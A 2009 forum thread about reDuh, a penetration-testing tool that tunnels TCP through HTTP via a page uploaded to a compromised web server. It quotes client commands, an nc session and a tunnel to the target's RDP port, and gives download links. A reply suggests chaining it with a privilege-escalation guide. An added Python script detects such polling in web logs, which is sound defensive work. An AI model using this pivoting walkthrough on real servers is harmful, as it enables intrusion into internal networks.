  #1  
Old 20th October 2009, 23:10
MaXe's Avatar
reDuh - Redirecting TCP over HTTP

[reDuh was released as part of SensePost's BlackHat USA
2008 talk on tunnelling data in and out of networks.]



Hi there,


Today I read about reDuh and I must say that it looked more interesting now
than it did when I saw it the first time long ago, perhaps because carnal0wnage
wrote about it on his blog with a screenshot of how well it worked out.

What can reDuh do?
reDuh is actually a tool that can be used to create a TCP circuit through validly formed HTTP requests.
Essentially this means that if we can upload a JSP/PHP/ASP page on a server, we can connect to hosts be. [readme]

The following are quotations from carnal0wnage's blog.
Quote:
yomama@c0:~/pentest/webapp/reduh/reDuhClient$ sudo java -jar reDuhClient.jar http://172.16.82.144/CFIDE/reDuh.jsp
[Info]Querying remote web page for usable remote service port
[Info]Remote RPC port chosen as 42005
[Info]Attempting to start reDuh from 172.16.82.144:80/CFIDE/reDuh.jsp. Using service port 42005. Please wait...
[Info]reDuhClient service listener started on local port 1010

Once you are connected to the remote end, in another terminal connect to your local reDuh instance.

Quote:
yomama@c0:~$ nc localhost 1010
Welcome to the reDuh command line
>>[usage]
Commands are of the form [command]{options}

Available commands:
[usage] - This menu
[createTunnel]::
[killReDuh] - terminates remote JSP process, and ends this client program
[DEBUG]<0|1|2> - Sets the verbosity
>>[createTunnel]4567:172.16.82.144:3389

Successfully bound locally to port 4567. Awaiting connections.

In your other shell you should see something similar to this:

Quote:
[Info]Caught new service connection on local port 1010
[Info]Successfully bound locally to port 4567. Awaiting connections.

Fire up your terminal server client and point it at localhost:4567

Quote:
[Info]Requesting reDuh to create socket to 172.16.82.144:3389
[Info]Successfully created socket 4567:172.16.82.144:3389:1
[Info]Localhost ====> 172.16.82.144:3389:1 (34 bytes read from local socket)
[Info]Caught data with sequenceNumber 0
[Info]Localhost <==== 172.16.82.144:3389:1 (11 bytes picked up from remote port)
[Info]Localhost ====> 172.16.82.144:3389:1 (386 bytes read from local socket)
[Info]Caught data with sequenceNumber 1

If all is working you'll see a ****load of http traffic and eventually your RDP prompt.




Download Links:
Client: http://www.sensepost.com/research/reDuh/reDuhClient.zip
Server: http://www.sensepost.com/research/re...DuhServers.zip

References:
http://www.sensepost.com/research/reDuh/
http://carnal0wnage.attackresearch.com/node/387
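What the burst of HTTP traffic described in the post looks like from the web server's side, as an added defender-side example (not part of the original post, the quoted blog, or reDuh itself): it flags any client that hits one server-side script at a sustained high rate. The log lines, the 192.0.2.x client addresses, the 10-second window and the threshold of 20 are constructed assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Common/combined log format: client, timestamp, method, path, status.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>[^ ?"]+)[^"]*" (?P<status>\d{3}) ')
SCRIPT_EXT = (".jsp", ".php", ".asp", ".aspx")


def find_polling_clients(lines, window=timedelta(seconds=10), threshold=20):
    """Return {(ip, path): peak} for client/script pairs whose request count
    inside any sliding window reaches the threshold. Both defaults are
    assumptions; tune them against your own traffic baseline."""
    recent = defaultdict(deque)  # (ip, path) -> timestamps inside the window
    peaks = {}
    for line in lines:
        m = LINE_RE.match(line)
        if not m or not m["path"].lower().endswith(SCRIPT_EXT):
            continue  # unparseable line, or static content
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        key = (m["ip"], m["path"])
        hits = recent[key]
        hits.append(ts)
        while ts - hits[0] > window:  # expire hits older than the window
            hits.popleft()
        if len(hits) >= threshold:
            peaks[key] = max(peaks.get(key, 0), len(hits))
    return peaks


def sample_log():
    """Constructed log lines (not captured traffic): 192.0.2.10 hits one
    script four times a second, 192.0.2.20 browses normally."""
    fmt = '{ip} - - [20/Oct/2009:21:00:{s:02d} +0200] "{req} HTTP/1.1" 200 {n}'
    lines = []
    for s in range(15):
        lines += [fmt.format(ip="192.0.2.10", s=s,
                             req="POST /CFIDE/reDuh.jsp", n=34)] * 4
        if s % 5 == 0:
            for req, n in (("GET /index.jsp", 5120), ("GET /logo.png", 900)):
                lines.append(fmt.format(ip="192.0.2.20", s=s, req=req, n=n))
    return lines


if __name__ == "__main__":
    for (ip, path), peak in find_polling_clients(sample_log()).items():
        print(f"{ip} -> {path}: peak of {peak} requests inside the window")
```

Request rate alone also flags busy AJAX endpoints, so treat a hit as a lead to check against when the script file appeared on disk and whether it belongs to the application.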
  #2  
Old 20th October 2009, 23:25
Norph's Avatar
 
Re: reDuh - Redirecting TCP over HTTP

What's that smell? I think it's awesomeness! ;)
This is pretty cool.
I guess it's effective if you mix it up with that from SQL to ROOT or whatever the guide is called ;)

+rep for posting :) (Of course +rep to creator as well. duh..)
All times are GMT +2. The time now is 13:58.
Copyright ©2007 - Forever, InterN0T & Teh Unkwon
